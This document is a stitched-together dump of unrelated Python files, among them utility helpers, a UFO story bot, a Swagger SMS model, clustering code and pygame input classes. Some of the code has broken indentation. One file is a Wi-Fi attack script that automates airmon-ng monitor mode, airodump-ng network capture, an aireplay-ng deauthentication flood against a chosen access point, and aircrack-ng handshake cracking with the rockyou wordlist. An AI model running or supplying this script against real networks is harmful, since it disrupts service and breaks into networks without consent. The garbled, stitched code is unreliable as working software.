    # Avoids shadowing the builtin `dir` and returns the predicate directly.
    return Path(directory).is_dir()
def str2bool(v: str) -> Union[str, bool]:
    """Convert a yes/no style string to bool; return "not bool" when unrecognized.

    A value that is already a bool is returned unchanged.
    """
    if isinstance(v, bool):
        return v
    lowered = v.lower()
    if lowered in ('yes', 'true', 't', 'y', '1'):
        return True
    if lowered in ('no', 'false', 'f', 'n', '0'):
        return False
    return "not bool"
def set_default_directory(directory: str) -> None:
    """Persist *directory* as the default backup directory in data/dir.txt."""
    # Stray trailing semicolon removed (un-Pythonic leftover).
    (getDataFolder() / 'dir.txt').write_text(str(directory))
def default_directory_exists() -> bool:
    """Return True when a default directory has been saved to data/dir.txt."""
    return (getDataFolder() / 'dir.txt').exists()
def check_for_duplicates(target):
    """Abort (error_message level 3 exits) when *target* already exists in db.json.

    NOTE(review): the check is a substring search on the raw JSON text, not a
    parsed lookup — a target whose string appears inside another value would
    false-positive; confirm this is acceptable.
    """
    contents = (getDataFolder() / 'db.json').read_text()
    # Membership test reads better than .find(...) != -1; also fixes the
    # user-facing typo "queriy" -> "query" in the error message.
    if f'"target": "{str(target)}"' in contents:
        error_message(f"Target {target} already exists. Use update to update a query, or use remove to remove it.", 3)
def check_if_use_saved_directory(directory: str) -> str:
    """Return *directory* if given, otherwise the saved default from data/dir.txt."""
    if directory is None:  # `is None`, not `== None` (PEP 8)
        return (getDataFolder() / 'dir.txt').read_text()
    return directory
|
from ufo_scraper import get_ufos
import requests
def bot(location):
    """Fetch all UFO reports, pick the most recent, and print a story relating
    it to *location* (network access via ufo_scraper.get_ufos)."""
    ufos = get_ufos()
    sufos = sorted(ufos, key=lambda u: u['date'], reverse=True)  # newest first
    latest_ufo = sufos[0]  # NOTE(review): IndexError if no reports — confirm
    make_story(location, latest_ufo)
def make_locator_map(starting_location, ending_location):
    """Return a Google Static Maps URL marking start (purple) and end (red).

    No HTTP request is sent; PreparedRequest is used only to URL-encode the
    query string. NOTE(review): the endpoint normally requires an API key —
    confirm the URL works unauthenticated for the intended use.
    """
    base_endpoint = 'https://maps.googleapis.com/maps/api/staticmap'
    myparams = {}
    myparams['size'] = '600x400'
    myparams['markers'] = []
    myparams['markers'].append('color:purple|' + starting_location)
    myparams['markers'].append('color:red|' + ending_location)
    preq = requests.PreparedRequest()
    preq.prepare_url(base_endpoint, myparams)
    return preq.url
def make_story(user_location, ufo):
    """Format and print a short report about *ufo* relative to *user_location*.

    Expects *ufo* to be a dict with 'date', 'shape', 'location' and 'summary' keys.
    """
    storytemplate = """On {date}, a {shape} shape UFO was seen near {place}. The report includes the following summary: {summary}. \n Here is where {user_location} is in relation to the UFO:
    {url}"""
    google_map_url = make_locator_map(user_location, ufo['location'])
    story = storytemplate.format(date=ufo['date'], shape=ufo['shape'], place=ufo['location'], url=google_map_url, user_location=user_location, summary=ufo['summary'])
    print(story.strip())
|
""" Необходимо создать (не программно) текстовый файл,
где каждая строка описывает учебный предмет и наличие
лекционных, практических и лабораторных занятий по этому
предмету и их количество. Важно, чтобы для каждого
предмета не обязательно были все типы занятий.
Сформировать словарь, содержащий название предмета и
общее количество занятий по нему. Вывести словарь на
экран. """
with open("lesson5_6.txt", 'r', encoding='utf-8') as file:
str = file.readlines()
tmp = []
for itm in str:
itm = itm.split(':')
tmp.append(itm)
str = tmp
for elem in str: # получаю подсписок
idx = 0
tmp = ''
for itm in elem: # строка из списка
sum = 0
if idx % 2 == 1:
for char in itm: # симовол из строки
if char.isdigit():
tmp += char
elif char == '(':
tmp += ' '
tmp = tmp.split(' ')
for num in tmp:
if num.isdigit():
sum += int(num)
idx +=1
elem[1] = sum
result = dict(str)
print(result)
|
from __future__ import print_function
import Molecules as m
from m.models.unsupervised import *
from m.utils import Extract as ex
class AutoEncoderTestSuite(object):
    """Regression suite that runs the same autoencoder round-trip under four labels."""
    def __init__(self):
        pass
    def regression_test(self):
        """Run every backend/model combination once."""
        print("Regression testing ...\n")
        self.test_pytorch_vae()
        self.test_pytorch_cvae()
        self.test_keras_vae()
        self.test_keras_cvae()
        print("Finished regression testing\n")
    def _run_case(self, label):
        """Shared test body: extract native contacts, build a linear
        encoder/decoder pair, fit on the training split, predict the test split.

        NOTE(review): all four original tests passed mode='pytorch' and used
        the same architecture regardless of the keras/VAE/CVAE label — confirm
        whether distinct configurations were intended.
        """
        print("Testing %s\n" % label)
        structure_path = "./protein.pdb"
        trajectory_path = "./cont-mat.array"
        native_contact = ex.ExtractNativeContact(structure_path, trajectory_path)
        native_contact.extract_native_contact()
        x_train, x_test = native_contact.load_native_contact(split=0.8)
        # Flattened square contact map -> input vector length.
        input_shape = x_train.shape[1]*x_train.shape[1]
        encoder = LinEncoder(latent_size = 3,
                             input_size = input_shape,
                             num_layers = 5,
                             activation = 'relu')
        decoder = LinDecoder(latent_size = 3,
                             output_size = input_shape,
                             num_layers = 5,
                             activation = 'relu')
        autoEncoder = AutoEncoder(encoder, decoder, mode='pytorch')
        autoEncoder.summary()
        # BUG FIX: the original called autoEncoder.fit(X_train) — an undefined
        # name (NameError at runtime); the loaded split is lowercase x_train.
        autoEncoder.fit(x_train)
        autoEncoder.predict(x_test)
        print("Finished testing %s\n" % label)
    def test_pytorch_vae(self):
        self._run_case("pytorch VAE")
    def test_pytorch_cvae(self):
        self._run_case("pytorch CVAE")
    def test_keras_vae(self):
        self._run_case("keras VAE")
    def test_keras_cvae(self):
        self._run_case("keras CVAE")
|
import os
import argparse
from os.path import isfile, join
import cv2
import numpy as np
from tqdm.auto import tqdm
def convert_frames_to_video(pathIn:str, pathOut:str, fps:int):
    """Assemble the image frames in *pathIn* (sorted by trailing frame number,
    e.g. frame_12.png) into a DIVX-encoded video at *pathOut* and *fps*."""
    frame_array = []
    files = [f for f in os.listdir(pathIn) if isfile(join(pathIn, f))]
    #for sorting the file names properly
    files.sort(key = lambda x: int(x.split("_")[-1].split(".")[0]))
    filename=os.path.join(pathIn, files[0])
    img = cv2.imread(filename)
    height, width, layers = img.shape
    size = (width, height)  # frame size taken from the first image
    for i in tqdm(range(len(files))):
        filename=os.path.join(pathIn, files[i])
        #reading each files
        img = cv2.imread(filename)
        height, width, layers = img.shape
        # NOTE(review): size is re-derived per frame but only the last value is
        # used for the writer — assumes all frames share one size; confirm.
        size = (width, height)
        #print(filename)
        #inserting the frames into an image array
        frame_array.append(img)  # NOTE(review): holds every frame in memory at once
    out = cv2.VideoWriter(pathOut,cv2.VideoWriter_fourcc(*'DIVX'), fps, size)
    for i in range(len(frame_array)):
        # writing to a image array
        out.write(frame_array[i])
    out.release()
    print(f"video saved: {pathOut}")
def main():
    """CLI wrapper: parse frames directory, output path and fps, then convert."""
    parser = argparse.ArgumentParser(description="Deep Dream tutorial")
    parser.add_argument("--frames_dir", default="dream_seq", required=True, type=str,
                    help="Directory for frames created using keep_dreaming.py")
    parser.add_argument("--output_file", default="results/video.avi", type=str, help="Path of output video.")
    parser.add_argument("--fps", default=30, type=int, help="Frames per second for video")
    args = parser.parse_args()
    pathIn= args.frames_dir
    pathOut = args.output_file
    fps = args.fps
    convert_frames_to_video(pathIn, pathOut, fps)
if __name__=="__main__":
    main()
#!/usr/bin/python
import re
# Demo of re.search / re.findall basics.
hand = open('../../file1.text')  # NOTE(review): the handle is never closed — use `with`
for line in hand:
    line = line.rstrip()
    if re.search('^xdg', line): # <==> if line.startswith('xdg'):
        print(line)
print()
# findall returns every non-overlapping match as a list of strings
x = 'My 2 favorite numbers are 43, 34 and 44'
y = re.findall('[0-9]+', x)
print(y)
print()
# Non-greedy local part then domain. NOTE(review): the pattern should be a raw
# string (r'\S+?@\S+') to avoid invalid-escape warnings.
s1 = 'From stephen.marquard@uct.ac.za Sat Jan 5 09:14:16 2008'
print(re.findall('\S+?@\S+', s1))
print()
|
from random import randint
# Random test-case generator: one case of 950-1000 random ints up to 1e9.
t = 1  # number of test cases emitted
print(t)
for i in range(1, t+1):
    n = randint(950, 1000)  # size of this test case
    print(n)
    for j in range(1, n+1):
        print(randint(1, 1000000000), end = ' ')
__author__ = 'madsens'
import Movies
# Python 2 script: starts the looping asset player from the project Movies module.
print 'Starting'
Movies.StartLoop('/home/pi/Halloween2015/Assets/LivingLogo')
|
from django.contrib import admin
from .models import Unit, Fermenter, BatchNoteType, BatchTestType, Batch, BatchNote, BatchTest, BatchCategory, BatchStyle
# Register your models here.
# Expose every brewing model in the Django admin with the default ModelAdmin.
admin.site.register(Unit)
admin.site.register(Fermenter)
admin.site.register(BatchNoteType)
admin.site.register(BatchTestType)
admin.site.register(Batch)
admin.site.register(BatchNote)
admin.site.register(BatchTest)
admin.site.register(BatchStyle)
admin.site.register(BatchCategory)
def divide_2(n):
    """Return how many times *n* is evenly divisible by 2 (its 2-adic valuation).

    Fixes: the original used `n /= 2`, drifting an int into a float (exact only
    for small values), and looped forever for n == 0.

    Raises:
        ValueError: if n is 0 (divisible by 2 indefinitely).
    """
    if n == 0:
        raise ValueError("0 is divisible by 2 infinitely many times")
    count = 0
    while n % 2 == 0:
        n //= 2  # floor division keeps n an exact int
        count += 1
    return count
# Read N and the list A; print the minimum number of times any element of A
# can be halved, i.e. the smallest 2-adic valuation over A.
N = int(input())
A = list(map(int,input().split()))
ans = 201  # sentinel above any possible count for the problem constraints
for i in A:
    i_div2 = divide_2(i)
    if i_div2 < ans:
        ans = i_div2
print(ans)
# Track the running maximum of the list, printing each time a new maximum is
# found. NOTE(review): `large` starts at 0, so an all-negative list would
# report 0 — confirm inputs are always positive.
large=0
for n in [12,30,35,67,3,56]:
    if n>large:
        large=n
        print(large,n)
print("hell",large)
|
# coding: utf-8
"""
Telstra SMS Messaging API
The Telstra SMS Messaging API allows your applications to send and receive SMS text messages from Australia's leading network operator. It also allows your application to track the delivery status of both sent and received SMS messages.
OpenAPI spec version: 2.1.3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class MessageSentResponse(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
    def __init__(self, to=None, delivery_status=None, description=None, message_id=None, message_type=None, number_segements=None):
        """
        MessageSentResponse - a model defined in Swagger
        :param dict swaggerTypes: The key is attribute name
                                  and the value is attribute type.
        :param dict attributeMap: The key is attribute name
                                  and the value is json key in definition.
        """
        # Attribute name -> Swagger type. NOTE: the 'number_segements' spelling
        # is part of the generated API surface and must not be corrected here.
        self.swagger_types = {
            'to': 'str',
            'delivery_status': 'str',
            'description': 'str',
            'message_id': 'str',
            'message_type': 'str',
            'number_segements': 'int'
        }
        # Attribute name -> JSON key used on the wire.
        self.attribute_map = {
            'to': 'to',
            'delivery_status': 'deliveryStatus',
            'description': 'description',
            'message_id': 'messageId',
            'message_type': 'messageType',
            'number_segements': 'numberSegements'
        }
        self._to = to
        self._delivery_status = delivery_status
        self._description = description
        self._message_id = message_id
        self._message_type = message_type
        self._number_segements = number_segements
    @property
    def to(self):
        """
        Gets the to of this MessageSentResponse.
        The mobile phone number (in E.164 format) that the message was sent to.
        :return: The to of this MessageSentResponse.
        :rtype: str
        """
        return self._to
    @to.setter
    def to(self, to):
        """
        Sets the to of this MessageSentResponse.
        The mobile phone number (in E.164 format) that the message was sent to.
        :param to: The to of this MessageSentResponse.
        :type: str
        """
        # `to` is mandatory in the API response, hence the explicit None check.
        if to is None:
            raise ValueError("Invalid value for `to`, must not be `None`")
        self._to = to
    @property
    def delivery_status(self):
        """
        Gets the delivery_status of this MessageSentResponse.
        The current status of the message for this address. Possible values are; 'DeliveryImpossible' – The message has been rejected and cannot be delivered. see the description field. 'MessageWaiting' – The message will be delivered as soon as possible.
        :return: The delivery_status of this MessageSentResponse.
        :rtype: str
        """
        return self._delivery_status
    @delivery_status.setter
    def delivery_status(self, delivery_status):
        """
        Sets the delivery_status of this MessageSentResponse.
        The current status of the message for this address. Possible values are; 'DeliveryImpossible' – The message has been rejected and cannot be delivered. see the description field. 'MessageWaiting' – The message will be delivered as soon as possible.
        :param delivery_status: The delivery_status of this MessageSentResponse.
        :type: str
        """
        # delivery_status is mandatory in the API response, hence the None check.
        if delivery_status is None:
            raise ValueError("Invalid value for `delivery_status`, must not be `None`")
        self._delivery_status = delivery_status
    @property
    def description(self):
        """
        Gets the description of this MessageSentResponse.
        This is a string that describes why a message could not be delivered.
        :return: The description of this MessageSentResponse.
        :rtype: str
        """
        return self._description
    @description.setter
    def description(self, description):
        """
        Sets the description of this MessageSentResponse.
        This is a string that describes why a message could not be delivered.
        :param description: The description of this MessageSentResponse.
        :type: str
        """
        # description is optional, so no validation is applied.
        self._description = description
@property
def message_id(self):
    """
    Gets the message_id of this MessageSentResponse.

    The message ID of the SMS that was sent. Use this ID to view the message
    status or to receive get responses.

    :return: The message_id of this MessageSentResponse.
    :rtype: str
    """
    return self._message_id
@message_id.setter
def message_id(self, message_id):
    """
    Sets the message_id of this MessageSentResponse.

    The message ID of the SMS that was sent. Optional field: no None-check.

    :param message_id: The message_id of this MessageSentResponse.
    :type: str
    """
    self._message_id = message_id
@property
def message_type(self):
    """
    Gets the message_type of this MessageSentResponse.

    A string that identifies the transport mechanism that was selected for
    delivering the message (one of "SMS", "MMS", "RCS").

    :return: The message_type of this MessageSentResponse.
    :rtype: str
    """
    return self._message_type
@message_type.setter
def message_type(self, message_type):
    """
    Sets the message_type of this MessageSentResponse.

    The transport mechanism selected for delivering the message.

    :param message_type: The message_type of this MessageSentResponse.
    :type: str
    :raises ValueError: if the value is not one of "SMS", "MMS", "RCS"
    """
    allowed_values = ["SMS", "MMS", "RCS"]
    if message_type in allowed_values:
        self._message_type = message_type
    else:
        raise ValueError(
            "Invalid value for `message_type` ({0}), must be one of {1}"
            .format(message_type, allowed_values)
        )
@property
def number_segements(self):
    """
    Gets the number_segements of this MessageSentResponse.

    An integer between 0 and 65536 indicating the number of chargeable
    segments in the message. For SMS this is the number of segments the
    message had to be divided into (after conversion to a character set
    understood by the SMS network).

    :return: The number_segements of this MessageSentResponse.
    :rtype: int
    """
    return self._number_segements
@number_segements.setter
def number_segements(self, number_segements):
    """
    Sets the number_segements of this MessageSentResponse.

    Number of chargeable segments in the message. Optional field: no
    validation is performed here.

    :param number_segements: The number_segements of this MessageSentResponse.
    :type: int
    """
    self._number_segements = number_segements
def to_dict(self):
    """
    Returns the model properties as a dict.

    Nested model objects (anything exposing ``to_dict``) are converted
    recursively, including when they appear inside lists or dict values.
    """
    out = {}
    for name, _ in iteritems(self.swagger_types):
        val = getattr(self, name)
        if isinstance(val, list):
            out[name] = [
                item.to_dict() if hasattr(item, "to_dict") else item
                for item in val
            ]
        elif hasattr(val, "to_dict"):
            out[name] = val.to_dict()
        elif isinstance(val, dict):
            out[name] = {
                k: (v.to_dict() if hasattr(v, "to_dict") else v)
                for k, v in val.items()
            }
        else:
            out[name] = val
    return out
def to_str(self):
    """Return a pretty-printed string of the model's dict representation."""
    properties = self.to_dict()
    return pformat(properties)
def __repr__(self):
    """Representation used by `print` and `pprint`."""
    return self.to_str()
def __eq__(self, other):
    """Return True when *other* is a MessageSentResponse with equal state."""
    if isinstance(other, MessageSentResponse):
        return self.__dict__ == other.__dict__
    return False
def __ne__(self, other):
    """Return True when the two objects are not equal (inverse of __eq__)."""
    return not (self == other)
|
import numpy as np
from sklearn.cluster import DBSCAN, MeanShift
from sklearn import metrics
from sklearn.preprocessing import StandardScaler
import image_utils
def _tri_coordinates_x(words):
    """Return one (left, center_x, right) triple per OCR word."""
    boxes = [word['coords'] for word in words]
    centers = image_utils.get_centroids_from_coords([word['coords'] for word in words])
    return [(box[0], center[0], box[2]) for center, box in zip(centers, boxes)]
def _tri_coordinates_y(words):
    """Return one (top, center_y, bottom) triple per OCR word."""
    boxes = [word['coords'] for word in words]
    centers = image_utils.get_centroids_from_coords([word['coords'] for word in words])
    return [(box[1], center[1], box[3]) for center, box in zip(centers, boxes)]
def cluster_column_tri(words, table_bounds, scale=True, triple=True):
    """Annotate OCR words with 'cluster-col' and 'cluster-row' labels via DBSCAN.

    Each word contributes three x samples (left, center, right) and three y
    samples (top, center, bottom). Columns are clustered on x, rows on y
    (rows always use only the vertical centers).

    :param words: list of dicts with a 'coords' (left, top, right, bottom) entry
    :param table_bounds: bounding box used to normalise coordinates
    :param scale: normalise coordinates against table_bounds before clustering
    :param triple: cluster all three x samples per word and majority-vote,
                   otherwise use only the center sample
    :return: the same word dicts, annotated in place
    """
    Xx = _tri_coordinates_x(words)
    Xy = _tri_coordinates_y(words)
    Xx = [x for xl in Xx for x in xl] # flatten
    Xy = [x for xl in Xy for x in xl] # flatten
    print(table_bounds)
    # print(cents)
    if scale:
        # Normalise so the hard-coded DBSCAN eps is resolution-independent.
        scaled = image_utils.scale_centroids(zip(Xx, Xy), table_bounds)
        Xxs = [c[0] for c in scaled]
        Xys = [c[1] for c in scaled]
        Xxs = np.array(Xxs).reshape(-1, 1)
        Xys = np.array(Xys).reshape(-1, 1)
    else:
        Xxs = np.array(Xx).reshape(-1, 1)
        Xys = np.array(Xy).reshape(-1, 1)
    # print(X)
    # #############################################################################
    # Compute DBSCAN
    # When not tripling, keep only the middle (center-x) sample of each word.
    Xxs = Xxs if triple \
        else [t[1] for t in [Xxs[i:i+3] for i in range(0, len(Xxs), 3)]]
    print(sorted([list(x)[0] for x in Xxs]))
    dbx = DBSCAN(eps=0.02, min_samples=1).fit(Xxs)
    # dbx = MeanShift().fit(Xxs)
    core_samples_mask = np.zeros_like(dbx.labels_, dtype=bool)
    # core_samples_mask[dbx.core_sample_indices_] = True
    labels = dbx.labels_
    # Number of clusters in labels, ignoring noise if present.
    n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)
    n_noise_ = list(labels).count(-1)
    print("n_cols total", n_clusters_)
    # Regroup the flat label array back into per-word triples.
    tricol = [labels[i:i+3] for i in range(0, len(labels), 3)] if triple else labels
    print([tcol for tcol in tricol])
    print(len(tricol), len(words))
    for word, col in zip(words, tricol): # majority vote if triple
        word['cluster-col'] = max(col, key=list(col).count) if triple else col
    # #############################################################################
    # Rows: always cluster only the vertical centers (middle of each triple).
    Xys = [t[1] for t in [Xys[i:i+3] for i in range(0, len(Xys), 3)]]
    # Xys = np.array(Xys).reshape(-1, 1)
    dby = DBSCAN(eps=0.02, min_samples=1).fit(Xys)
    core_samples_mask = np.zeros_like(dby.labels_, dtype=bool)
    core_samples_mask[dby.core_sample_indices_] = True
    labels = dby.labels_
    # Number of clusters in labels, ignoring noise if present.
    n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)
    n_noise_ = list(labels).count(-1)
    print("n_rows total", n_clusters_)
    trirow = labels#[list(labels[i:i+3]) for i in range(0, len(labels), 3)]
    print(trirow)
    for word, row in zip(words, trirow):
        word['cluster-row'] = row#max(row, key=list(row).count) # majority vote
    # # #############################################################################
    # dby = DBSCAN(eps=0.05, min_samples=10).fit(Xys)
    # core_samples_mask = np.zeros_like(db.labels_, dtype=bool)
    # core_samples_mask[db.core_sample_indices_] = True
    # labels = db.labels_
    # # Number of clusters in labels, ignoring noise if present.
    # n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)
    # n_noise_ = list(labels).count(-1)
    # trirow = [list(labels[i:i+3]) for i in range(0, len(labels), 3)]
    # print(trirow)
    # for word, row in zip(words, trirow):
    #     word['cluster-row'] = max(set(row), key=list(row).count) # majority vote
    return words
#!/usr/bin/env python
import subprocess
import os
import time
import string
import csv
dev_list = [] # to create file
dev_list_1 = [] # final device list
dev_list_2 = [] # Dumped list
dev_list_3 = [] # Dumped list 2
def return_fw():
    """Drop back into the cyanide framework's main shell menu."""
    subprocess.call(['bash', '-c', ". ./cyanide-framework.sh && main"])
def get_dev():
    """Discover network interfaces and populate the global bookkeeping.

    Side effects: writes devlist.txt, appends to dev_list and dev_list_1,
    and sets the global ``lele`` to the number of interfaces found.
    """
    global lele
    command = "ip -br link show | awk '{print $1}'"
    qwerty = subprocess.check_output(['bash', '-c', command]).decode("utf-8")
    dev_list.append(qwerty)
    # Keep the on-disk copy for debugging, using context managers so the
    # handles are always closed (the original leaked them on error).
    with open("devlist.txt", "w") as f:
        for chunk in dev_list:
            f.write(chunk)
    count = 1
    with open("devlist.txt", "r") as y:
        for x in y:
            # BUG FIX: strip the trailing newline; the original stored
            # "wlan0\n", which later produced broken airmon-ng commands.
            iface = x.strip()
            dev_list_1.append(iface)
            print(count, ")", iface)
            count += 1
    lele = len(dev_list_1)
def choosing_and_monitoring():
    """Prompt for an interface and put it into monitor mode via airmon-ng.

    Re-prompts recursively on an out-of-range choice.
    """
    get_dev()
    global option
    print("Enter the Option 1 -", lele, " :")
    option = int(input("Option: "))
    # BUG FIX: the original tested `option <= lele` first, so 0 and negative
    # numbers were accepted and indexed the list from the end.
    if 1 <= option <= lele:
        iface = dev_list_1[option - 1]
        print(iface)
        subprocess.run(["bash", "-c", "airmon-ng start " + iface])
    else:
        print("[-]Wrong Option. Please Try Again")
        choosing_and_monitoring()
# going in monitor mode
def list_empty():
    """Reset the interface bookkeeping lists for a fresh scan."""
    del dev_list[:]
    del dev_list_1[:]
def dumping():
    """Run airodump-ng, parse its CSV output and let the user pick a network.

    Sets the globals ``bssid``, ``channel`` and ``iface_1`` used by the
    attack helpers afterwards. Re-prompts recursively on a bad choice.
    """
    count = 0
    global bssid
    global channel
    global iface_1
    iface_1 = dev_list_1[option - 1]
    cmd_dump = 'xterm -T "Dumping Networks" -fa monaco -fs 13 -bg red -e "airodump-ng ' + iface_1 + ' -w output --output-format csv"'
    subprocess.call(['bash', '-c', cmd_dump])
    # Collect every non-empty CSV row (APs first, then a station section).
    with open("output-01.csv", "r") as csv_file:
        for row in csv.reader(csv_file):
            if len(row) != 0:
                dev_list_2.append(row)
    for j in range(len(dev_list_2) - 4):
        if dev_list_2[j][13] != " ":
            a = dev_list_2[j][13]  # ESSID
            b = dev_list_2[j][0]   # BSSID
            c = dev_list_2[j][3]   # channel
            print("%d, %-15s, %-15s, %-6s" % (count, a, b, c))
            count += 1
    print("Please Select the Network in Your Area: ")
    option_2 = int(input("Enter the Serial Number: "))
    if (option_2 <= 0) or (option_2 >= len(dev_list_2) - 4):
        print("[-] Wrong Option. Please Try Again :( ")
        dumping()
    else:
        bssid = dev_list_2[option_2][0]
        channel = dev_list_2[option_2][3]
        # BUG FIX: the original concatenated "--channel" directly to the
        # number (producing e.g. "--channel6"); insert the missing space.
        cmd_dump_1 = 'xterm -T "Dumping Specific Network" -fa monaco -fs 13 -bg red -e "airodump-ng --bssid ' + bssid + ' --channel ' + channel + " " + iface_1 + ' -w output_2 --output-format csv"'
        subprocess.call(['bash', '-c', cmd_dump_1])
def lets_play():
    """Flood the chosen AP with deauthentication frames via aireplay-ng."""
    # BUG FIX: the original glued the BSSID and the interface together with
    # no separator and never closed the quote opened after xterm's -e flag.
    cmd_play = 'xterm -T "Dumping Specific Network" -fa monaco -fs 13 -bg red -e "aireplay-ng -0 100 -a ' + bssid + ' ' + iface_1 + '"'
    subprocess.call(["bash", "-c", cmd_play])
def pass_crack():
    """Crack the captured handshake with aircrack-ng, clean up, show the key."""
    crack_cmd = 'xterm -T "Cr4cKinG PasSw0rD" -fa monaco -fs 13 -bg red -e "aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt -l keyfound.txt"'
    for shell_cmd in (crack_cmd, "rm -rf hack1-*", "cat keyfound.txt"):
        subprocess.call(["bash", "-c", shell_cmd])
# Script entry point: list interfaces, enable monitor mode, dump networks.
try:
    print("[*] There are the following Network Interfaces")
    choosing_and_monitoring()
    print("[*] Monitor Mode Achieved")
    time.sleep(4.5)  # give airmon-ng a moment to settle before dumping
    dumping()
except KeyboardInterrupt:
    # On Ctrl-C: return to the framework menu, then try cracking whatever
    # capture has been collected so far.
    return_fw()
    pass_crack()
|
from dataclasses import dataclass
from typing import Dict, Union, Set
import pygame
from game.constants import DEBUG
from game.util import clamp
from game.base.signal import Signal
class ButtonInput:
    """Abstract source of press/release events feeding a Button."""

    def match(self, event) -> bool:
        """Return True when *event* belongs to this input (base: never)."""
        return False

    def update(self, event):
        """Return the pressed-state for a matching event, else None."""
        if not self.match(event):
            return None
        return self.pressed(event)

    def pressed(self, event) -> bool:
        """Whether a matching event is a press or a release"""
        return False
@dataclass(frozen=True)
class KeyPress(ButtonInput):
    """A keyboard key used as a button input."""

    key: int

    def match(self, event):
        """True for KEYDOWN/KEYUP events carrying our key code."""
        if event.type not in (pygame.KEYDOWN, pygame.KEYUP):
            return False
        return event.key == self.key

    def pressed(self, event) -> bool:
        """Whether a matching event is a press or a release"""
        return event.type == pygame.KEYDOWN
@dataclass(frozen=True)
class JoyButton(ButtonInput):
    """A physical button on a specific joystick."""

    joy_id: int
    button: int

    def match(self, event):
        """True for button-down/up events from our joystick and button."""
        if event.type not in (pygame.JOYBUTTONDOWN, pygame.JOYBUTTONUP):
            return False
        return event.joy == self.joy_id and event.button == self.button

    def pressed(self, event):
        """Whether a matching event is a press or a release"""
        return event.type == pygame.JOYBUTTONDOWN
@dataclass(frozen=True)
class JoyAxisTrigger(ButtonInput):
    """A joystick axis treated as a boolean input.

    The "button" is pressed when the axis value is above the threshold
    (or below it, when ``above`` is False).
    """

    joy_id: int
    axis: int
    # BUG FIX: the default 0.5 is a float; the annotation said `int`.
    threshold: float = 0.5
    # Whether the button is pressed when the value is above or below the
    # threshold.
    above: bool = True

    def match(self, event) -> bool:
        """True for axis-motion events from our joystick and axis."""
        return (
            event.type == pygame.JOYAXISMOTION
            and event.joy == self.joy_id
            and event.axis == self.axis
        )

    def pressed(self, event) -> bool:
        """Press/release state of a matching event relative to the threshold."""
        return self.above == (event.value > self.threshold)
@dataclass(frozen=True)
class JoyAxis:
    """A joystick axis as an analog input with a dead zone."""

    joy_id: int
    axis: int
    reversed: bool = False
    sensibility: float = 1.0
    threshold: float = 0.2

    def match(self, event):
        """True for axis-motion events from our joystick and axis."""
        if event.type != pygame.JOYAXISMOTION:
            return False
        return event.joy == self.joy_id and event.axis == self.axis

    def value(self, event):
        """The value of a matching event (0 inside the dead zone)."""
        raw = event.value
        if abs(raw) < self.threshold:
            return 0
        sign = -1 if self.reversed else 1
        return sign * raw * self.sensibility
class Button:
    """A boolean input aggregated from any number of ButtonInput sources."""

    def __init__(self, *keys):
        """
        A boolean input.

        :param keys: any number of keycodes or ButtonInputs
        """
        self._keys: Set[ButtonInput] = {
            KeyPress(key) if isinstance(key, int) else key for key in keys
        }
        # Last known pressed state per ButtonInput source.
        self._pressed = {}
        self.just_released = False
        self.just_pressed = False
        self.just_double_pressed = False
        self._always = Signal()
        self._on_press = Signal()
        self._on_release = Signal()
        self._on_double_press = Signal()
        # Each repeat slot carries .delay and .repetitions attributes.
        self._repeat = Signal()
        self.last_press = float("-inf")
        """Time since last release of the button"""
        self.press_time = 0
        self.dt = 0  # time since last frame
        """
        Time the button has been pressed.
        If it isn't pressed, it is the duration of the last press.
        """

    def update(self, dt):
        """Trigger all callbacks and update times."""
        self.last_press += dt
        if self.pressed:
            self.press_time += dt
        self.dt = dt
        self._always(self)
        if self.just_pressed:
            self._on_press(self)
        if self.just_double_pressed:
            self._on_double_press(self)
        if self.just_released:
            self._on_release(self)
        if self.pressed:
            # Block refresh while iterating so slots are not mutated mid-loop.
            self._repeat.blocked += 1
            for wref in self._repeat.slots:
                c = wref()
                if not c:
                    continue
                # Fire once each `delay` seconds the button has been held.
                if c.delay * c.repetitions <= self.press_time:
                    c.repetitions += 1
                    c(self)
            self._repeat.blocked -= 1
            self._repeat.refresh()

    def event(self, events):
        """Consume pygame events and recompute the edge flags."""
        self.just_pressed = False
        self.just_double_pressed = False
        self.just_released = False
        old_pressed = self.pressed
        for event in events:
            for key in self._keys:
                if key.match(event):
                    self._pressed[key] = key.pressed(event)
        if not old_pressed:
            if self.pressed:
                self.press_time = 0
                self.just_pressed = True
                if self.double_pressed:
                    self.just_double_pressed = True
        else:
            if not self.pressed:
                # All keys were just released
                self.last_press = 0
                self.just_released = True
                for wref in self._repeat.slots:
                    c = wref()
                    if not c:
                        continue
                    c.repetitions = 0

    @property
    def pressed(self):
        """Whether the button is actually pressed."""
        return sum(self._pressed.values(), 0) > 0

    @property
    def double_pressed(self):
        """Whether the button was just double pressed"""
        return self.pressed and self.last_press < 0.1

    def always_call(self, callback):
        return self._always.connect(callback)

    def on_press(self, callback):
        return self._on_press.connect(callback)

    def on_release(self, callback):
        return self._on_release.connect(callback)

    def on_double_press(self, callback):
        return self._on_double_press.connect(callback)

    def on_press_repeated(self, callback, delay):
        """
        Call `callback` when the button is pressed and
        every `delay` seconds while it is pressed.

        Note: the same function cannot be a repeat callback
        for two different things.
        """
        slot = self._repeat.connect(callback)
        slot.delay = delay
        slot.repetitions = 0
        return slot

    def disconnect(self, callback):
        """Remove a callback from all types if present."""
        if callback in self._always:
            self._always.disconnect(callback)
        if callback in self._on_press:
            self._on_press.disconnect(callback)
        if callback in self._on_release:
            self._on_release.disconnect(callback)
        if callback in self._on_double_press:
            self._on_double_press.disconnect(callback)
        if callback in self._repeat:
            # BUG FIX: this previously disconnected from _on_double_press
            # again, leaving repeat callbacks connected forever.
            self._repeat.disconnect(callback)
class Axis:
    def __init__(self, negative, positive, *axis, smooth=0.1):
        """
        An input axis taking values between -1 and 1.

        Callbacks are disconnected with -=

        :param negative: keycode or list of keycodes
        :param positive: keycode or list of keycodes
        :param axis: any number of JoyAxis
        :param smooth: Duration (s) to smooth values
        """
        if isinstance(negative, int):
            negative = [negative]
        if isinstance(positive, int):
            positive = [positive]
        # Per-key pressed state for each direction.
        self._negative = {KeyPress(n): False for n in negative}
        self._positive = {KeyPress(p): False for p in positive}
        self._axis = set(axis)
        self._callbacks = Signal()
        self._smooth = smooth
        self.non_zero_time = 0
        self.zero_time = 0
